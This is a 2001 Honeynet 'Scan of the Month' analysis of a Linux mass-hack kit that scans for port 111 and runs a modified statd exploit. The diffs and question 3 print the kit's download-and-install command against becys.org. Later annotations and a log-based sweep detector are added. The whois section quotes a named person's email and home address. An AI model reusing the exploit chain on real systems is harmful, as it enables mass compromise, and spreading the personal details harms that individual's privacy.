From Stephane.Aubert@hsc.fr Fri Mar 23 13:53:10 2001
Date: Wed, 21 Mar 2001 18:55:44 +0000
From: Stephane Aubert
To: project@honeynet.org
Cc: Denis Ducamp, Lance Spitzner
Subject: scan of the month #13

Scan of the Month #13 : March 2001
Stephane Aubert
Denis Ducamp

The Challenge:
--------------

1. What is the blackhat attempting to do with his command line syntax?

Hack a lot of Linux boxes. Usually such boxes, once rooted, are used in DoS or DDoS attacks, for example with "ping -f ircserver -s 65000" or papasmurf.

2. What does the tool accomplish?

This set of programs is a mass-hack tool. Its goal is to find open 111/tcp ports on remote computers (on a class A, B or C network) and automatically try to exploit a well-known vulnerability in statd on Linux. If a remote shell is obtained, a few commands are launched in order to download (from the Internet) and run a program on the freshly rooted host. This program can be anything, such as t0rnkit or whatever rootkit you want.

3. How does the tool work?

To run this tool you must run the script luckgo.

. luckgo: the first script
  It takes at least one argument: the class A to scan. With 2 or 3 arguments it will scan a class B or C.
  Example: "./luckgo 12 20" will scan 12.20/16 (AT&T)
  It generates binary files for the scanner and the exploit, then runs the scanner on the remote class and the port 111/tcp.

. luckscan-a: the scanner
  This program is a primitive TCP port scanner. It tries to connect to port 111/tcp on every host. When such a port is open, it runs the statd exploit (called here luckstatdx) without checking whether statd is present.

. luckstatdx: the statd exploit
  This one tries to exploit a format string bug in rpc.statd on Linux (RH 6.x). If it succeeds (and obtains a root shell) it will automatically run the following commands:

    cd /; uname -a; id
    wget -nd http://www.becys.org/xzibit.tar.gz
    tar -zxvf xzibit.tar.gz
    cd lamerk; ./install
    cd /; rm -rf lamerk xzibit.tar.gz

  This web server is no longer accessible.

4. Is this tool a worm, or would you classify it as something else?
First of all: this tool is a mass-hack tool! It can be or become a worm depending on what is found in the file xzibit.tar.gz, for example if it installs and launches luckgo in the background.

5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

These tools are not original, and no more "clever" than their sources. Both tools are public.

. luckscan-a is known as pscan-a.c and can be found on:
  http://www.self-evident.com/security/scanners/pscan.c.gz
  pscan.c   : by Volatile
  pscan-a.c : by natas

% diff -U 1 pscan-a.c luckscan-a.c
--- pscan-a.c	Mon Mar 19 14:57:27 2001
+++ luckscan-a.c	Tue Dec  5 02:15:24 2000
@@ -170,5 +170,9 @@
 else {
- printf("%s\n",
+ char luck[100];
+ sprintf(luck,"./luckstatdx -d 0 %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
+ printf("Lets try to root the %s\n",
 (char *)inet_ntoa(connlist[i].addr.sin_addr), (time(0)-connlist[i].a));
+ system(luck);
+ printf("We continue to h4x0r ...\n");
 close(connlist[i].s);

. luckstatdx comes from statdx.c, published on bugtraq in Aug 2000 by ron1n.
  To: BUGTRAQ@SECURITYFOCUS.COM
  Subject: Redhat Linux 6.x remote root exploit
  From: ron1n -
  Date: Sat, 5 Aug 2000 03:43:20 EST

% diff -U 1 statdx.c luckstatdx.c
--- statdx.c	Wed Mar 21 14:32:51 2001
+++ luckstatdx.c	Wed Mar 21 14:30:00 2001
@@ -161,3 +161,3 @@
- fprintf(stderr, "statdx by ron1n \n");
+ fprintf(stderr, "statdx modify by becys \n");
 fprintf(stderr, "Usage: %s [-t] [-p port] [-a addr] [-l len]\n", app);
@@ -186,6 +186,6 @@
 fd_set fds;
-
+// Becys was modify herre some cmd.
 fmax = max(fileno(stdin), sockd) + 1;
- send(sockd, "cd /; ls -alF; id;\n", 19, 0);
-
+ send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0);
+// Aici cred ca trebuie un exit.
 for(;;)
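Review bot: in the luckscan-a.c hunk, the sprintf() into luck[100] is given two arguments for a single %s conversion; the trailing (time(0)-connlist[i].a) is a leftover from the printf() it replaced and is silently ignored. The 100-byte buffer is ample for the fixed prefix plus a dotted quad, so the call is not itself an overflow; what matters to an analyst is that every successful 111/tcp connect now shells out to "./luckstatdx -d 0 <addr>", which explains why a host running this binary fires a statd exploit attempt at every portmapper it finds whether or not statd is there, and why the literal strings "Lets try to root the" and "We continue to h4x0r" are reliable markers when identifying the scanner binary on a compromised system.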
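Review bot: the only change in the @@ -161 hunk is the banner string, which replaces ron1n's credit with "statdx modify by becys"; no exploit logic is touched here. That string, next to the unchanged usage line, is the quickest way to tell a luckstatdx binary recovered from a rooted host apart from the published statdx.c, and it ties the build to the becys.org domain whose whois record is quoted in the bonus question.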
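Review bot: the length argument of send() in the @@ -186 hunk is still 19, the length of the original "cd /; ls -alF; id;\n", so only the first 19 bytes of the much longer new string ("cd /; uname -a; id;", with no trailing newline) are actually written to the remote shell; the wget/tar/install sequence that question 3 describes as automatic is never transmitted by this code, and the truncated fragment is not even executed until further input reaches the shell through runshell(). For incident response this matters: finding lamerk or xzibit.tar.gz on a victim of this binary indicates the intruder followed up interactively rather than the exploit installing them by itself. The Romanian comment "Aici cred ca trebuie un exit" ("here I think an exit is needed") is also a second attribution clue alongside the whois data, since it suggests the modifier's working language.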
@@ -249,3 +249,3 @@
 {
- printf("OMG! You now have rpc.statd technique!@#$!\n");
+ printf("You now have a new server rooted with rpc.statd technique and becys|ReSpEkT scan-h4x0r !\n");
 runshell(sockd);
@@ -497,5 +497,5 @@
 clnt_perror(clnt, "clnt_call()");
- printf("A timeout was expected. Attempting connection to shell..");
+ printf("Hmm,maibe i can root it. Attempting connection to shell..\n");
 sleep(5);
 connection(addr);
- printf("Failed\n");
+ printf("Fucking shit,i cant,sorry.\n");
 }

Bonus Question:
---------------

What information can you obtain about who is using or created the tool?

We used to find tools like pscan, statdx, amdexa, smurf5, etc. on rooted hosts. Sometimes we can get the IP addresses of other rooted boxes. For information, "whois -i becys.org" gives:

Domain Name: BECYS.ORG
Administrative Contact:
  Qian Wang  becys@yahoo.com
  bSoft
  1 Hensel Dr. Apt.#Z1F
  College Station, Texas 77840
...
Record updated on 2000-09-11 00:00:00.
Record created on 2000-09-11.

-- 
Stephane AUBERT  Stephane.Aubert@hsc.fr
Herve Schauer Consultants  -=-  Network Security Consultant
http://www.hsc.fr/  Phone : +33 141 409 700
------------------=[ RFC1855 is good for us ! ]=--------------------
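The scanner behaviour described in question 3 (one source connecting to 111/tcp on host after host across a class A, B or C range) leaves a recognisable trace in perimeter logs. The following Python is an added example, not part of the original submission or of the tools analysed: it flags sources that probe the portmapper port on many distinct hosts in constructed netfilter-style log lines, and reports whether the targets form the consecutive run a linear scanner produces. The log format, addresses and threshold are assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines in netfilter/iptables syslog format (not taken from
# the honeynet capture): one source sweeping 111/tcp across consecutive hosts,
# plus unrelated background traffic from a second source.
SAMPLE_LOG = """\
Mar 21 18:40:01 gw kernel: IN=eth0 OUT= SRC=192.0.2.77 DST=10.1.2.1 PROTO=TCP SPT=32771 DPT=111 SYN
Mar 21 18:40:01 gw kernel: IN=eth0 OUT= SRC=192.0.2.77 DST=10.1.2.2 PROTO=TCP SPT=32772 DPT=111 SYN
Mar 21 18:40:01 gw kernel: IN=eth0 OUT= SRC=192.0.2.77 DST=10.1.2.3 PROTO=TCP SPT=32773 DPT=111 SYN
Mar 21 18:40:02 gw kernel: IN=eth0 OUT= SRC=198.51.100.5 DST=10.1.2.9 PROTO=TCP SPT=40000 DPT=80 SYN
Mar 21 18:40:02 gw kernel: IN=eth0 OUT= SRC=192.0.2.77 DST=10.1.2.4 PROTO=TCP SPT=32774 DPT=111 SYN
Mar 21 18:40:02 gw kernel: IN=eth0 OUT= SRC=192.0.2.77 DST=10.1.2.5 PROTO=TCP SPT=32775 DPT=111 SYN
Mar 21 18:40:03 gw kernel: IN=eth0 OUT= SRC=198.51.100.5 DST=10.1.2.9 PROTO=TCP SPT=40001 DPT=111 SYN
"""

LINE_RE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=TCP .*?DPT=(?P<dpt>\d+)")


def parse_syn_log(text):
    """Yield (src, dst, dport) for every TCP line matching the assumed format."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m.group("src"), m.group("dst"), int(m.group("dpt"))


def find_portmapper_sweeps(text, port=111, min_hosts=4):
    """Return {src: sorted destinations} for sources that probed `port` on at
    least `min_hosts` distinct hosts, i.e. a horizontal sweep like luckscan-a's."""
    targets = defaultdict(set)
    for src, dst, dport in parse_syn_log(text):
        if dport == port:
            targets[src].add(dst)
    numeric = lambda ip: tuple(int(o) for o in ip.split("."))
    return {src: sorted(dsts, key=numeric)
            for src, dsts in targets.items() if len(dsts) >= min_hosts}


def is_sequential(dsts):
    """True when the (sorted) destinations are consecutive in the last octet,
    the pattern a linear scanner leaves; simplified to a single /24."""
    last = [int(ip.split(".")[-1]) for ip in dsts]
    return all(b - a == 1 for a, b in zip(last, last[1:]))


if __name__ == "__main__":
    for src, dsts in find_portmapper_sweeps(SAMPLE_LOG).items():
        print(f"{src} probed 111/tcp on {len(dsts)} hosts, sequential={is_sequential(dsts)}")
```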